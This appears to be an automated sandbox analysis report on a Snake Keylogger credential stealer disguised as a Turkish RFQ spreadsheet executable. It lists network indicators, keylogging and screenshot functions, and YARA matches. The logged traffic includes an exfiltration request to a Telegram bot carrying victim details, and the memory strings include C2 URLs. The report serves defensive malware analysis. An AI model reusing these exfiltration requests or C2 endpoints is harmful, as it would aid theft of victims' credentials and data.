Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2018:29:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2019:08:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 14 Oct 2024 09:05:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 14 Oct 2024 09:05:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2758777957.0000000000433000.00000040.00000400.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2758777957.0000000000433000.00000040.00000400.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562152532.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1595308417.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, qovDEn.exe.1.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2758777957.0000000000433000.00000040.00000400.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20a
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: qovDEn.exe, 0000000F.00000002.2761770176.0000000003561000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003552000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003592000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000321C000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000355C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000311F000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033EF000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000345E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033EF000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: qovDEn.exe, 0000000F.00000002.2761770176.000000000345E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000311F000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003419000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000345E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: qovDEn.exe, 0000000F.00000002.2761770176.0000000003592000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000324D000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000358D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49754 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.qovDEn.exe.4009a28.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.qovDEn.exe.3fc6a08.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.qovDEn.exe.4009a28.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.qovDEn.exe.3fc6a08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.41c8bb8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.4185b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe PID: 7064, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: qovDEn.exe PID: 4068, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_014EE1F4	1_2_014EE1F4
